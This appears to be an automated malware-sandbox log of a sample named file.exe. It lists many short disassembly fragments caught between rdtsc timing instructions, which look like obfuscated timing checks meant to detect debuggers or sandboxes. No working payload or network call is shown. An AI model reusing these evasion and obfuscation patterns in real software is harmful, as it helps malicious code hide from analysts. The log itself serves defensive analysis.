Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30AEE second address: E30B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b jl 00007F60F0C8AB56h 0x00000011 lea ebx, dword ptr [ebp+1245286Dh] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F60F0C8AB58h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17BCh], esi 0x00000037 mov edx, dword ptr [ebp+122D3444h] 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F60F0C8AB69h 0x00000044 push eax 0x00000045 push edx 0x00000046 jnl 00007F60F0C8AB56h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30C09 second address: E30C13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30C13 second address: E30C49 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F0C8AB58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 327B780Ch 0x00000013 jg 00007F60F0C8AB5Ah 0x00000019 mov dx, 9CB4h 0x0000001d lea ebx, dword ptr [ebp+12452876h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30C49 second address: E30C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D06 second address: E30D63 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F60F0C8AB69h 0x00000011 jnc 00007F60F0C8AB5Ch 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d jne 00007F60F0C8AB5Ch 0x00000023 jmp 00007F60F0C8AB61h 0x00000028 popad 0x00000029 mov eax, dword ptr [eax] 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e push edi 0x0000002f pop edi 0x00000030 pop esi 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30D63 second address: E30E22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F60F0BA1035h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F60F0BA1033h 0x00000014 pop eax 0x00000015 jl 00007F60F0BA1026h 0x0000001b xor dword ptr [ebp+122D33D3h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F60F0BA1028h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d push 00000000h 0x0000003f jng 00007F60F0BA102Ch 0x00000045 mov dword ptr [ebp+122D20BEh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push ecx 0x00000050 call 00007F60F0BA1028h 0x00000055 pop ecx 0x00000056 mov dword ptr [esp+04h], ecx 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc ecx 0x00000063 push ecx 0x00000064 ret 0x00000065 pop ecx 0x00000066 ret 0x00000067 jl 00007F60F0BA1029h 0x0000006d movzx edi, di 0x00000070 push BB8E6E64h 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F60F0BA1039h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30E22 second address: E30E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E30E28 second address: E30E49 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F0BA1026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 7B8E6E64h 0x00000013 lea ebx, dword ptr [ebp+12452881h] 0x00000019 movzx edx, ax 0x0000001c push eax 0x0000001d pushad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50A2E second address: E50A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50BB3 second address: E50BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA102Eh 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F60F0BA1031h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F60F0BA1026h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50BE1 second address: E50BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F60F0C8AB6Ch 0x0000000c jmp 00007F60F0C8AB60h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50D8B second address: E50D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50D8F second address: E50DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0C8AB62h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E510A6 second address: E510B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E510B8 second address: E510E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB5Dh 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F60F0C8AB63h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E510E3 second address: E5110A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F0BA102Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Eh 0x00000012 ja 00007F60F0BA1026h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51266 second address: E5126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5126A second address: E51287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F60F0BA102Eh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51415 second address: E5145D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F60F0C8AB66h 0x00000011 pushad 0x00000012 jnp 00007F60F0C8AB56h 0x00000018 jmp 00007F60F0C8AB65h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44950 second address: E44956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44956 second address: E44960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F60F0C8AB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E44960 second address: E44966 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5233A second address: E52343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E52343 second address: E52349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E55CF1 second address: E55CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E20724 second address: E20728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E57B80 second address: E57B8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60F0C8AB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E57B8E second address: E57B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E57B92 second address: E57BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F60F0C8AB64h 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F60F0C8AB56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5818F second address: E581A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jl 00007F60F0BA1026h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E56A14 second address: E56A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E58279 second address: E5827D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5827D second address: E58283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D517 second address: E5D51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D51B second address: E5D527 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F0C8AB56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D527 second address: E5D54E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F0BA1037h 0x00000008 js 00007F60F0BA1032h 0x0000000e jp 00007F60F0BA1026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D54E second address: E5D559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D559 second address: E5D55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D55D second address: E5D578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F60F0C8AB56h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D6CC second address: E5D6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5D6D0 second address: E5D6EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F0C8AB65h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DC16 second address: E5DC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F0BA102Ch 0x0000000c jbe 00007F60F0BA1026h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DC2B second address: E5DC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0C8AB63h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F60F0C8AB67h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DDB8 second address: E5DDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DDBF second address: E5DDD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F60F0C8AB56h 0x00000009 je 00007F60F0C8AB56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5DF02 second address: E5DF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0BA1032h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E7F6 second address: E5E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E8E8 second address: E5E8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E8F5 second address: E5E910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F0C8AB5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E910 second address: E5E936 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 or edi, dword ptr [ebp+122D1B4Eh] 0x0000000e push E19D5980h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F0BA1031h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5E936 second address: E5E93B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EA6E second address: E5EA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EA72 second address: E5EA76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5EC18 second address: E5EC1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5F52B second address: E5F531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5F66C second address: E5F683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60F0BA102Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5F8A8 second address: E5F8AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA51 second address: E5FA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA55 second address: E5FA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA5F second address: E5FA6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA6C second address: E5FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FA70 second address: E5FA79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FAF6 second address: E5FAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FAFA second address: E5FAFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FAFF second address: E5FB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jne 00007F60F0C8AB5Bh 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E609F5 second address: E609F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E609F9 second address: E609FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6080E second address: E6082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F0BA102Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 js 00007F60F0BA1026h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6082D second address: E60847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F0C8AB65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A0ED second address: E6A0FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F60F0BA1026h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B40 second address: E63B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A0FB second address: E6A0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B44 second address: E63B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F60F0C8AB5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A0FF second address: E6A111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F60F0BA1026h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B6C second address: E63B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A111 second address: E6A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E63B73 second address: E63B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6A115 second address: E6A11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6BF6E second address: E6BF73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6BF73 second address: E6BFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F60F0BA1028h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb bh, FFFFFFC1h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F60F0BA1028h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+122D1895h] 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D294Ch] 0x0000004f xchg eax, esi 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F60F0BA1036h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CF6D second address: E6CF72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CF72 second address: E6CFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F60F0BA1028h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, 56AD52E7h 0x00000027 cmc 0x00000028 push 00000000h 0x0000002a mov bx, si 0x0000002d mov di, E6A4h 0x00000031 push 00000000h 0x00000033 mov edi, 145AC298h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CFB3 second address: E6CFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6CFBA second address: E6CFC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
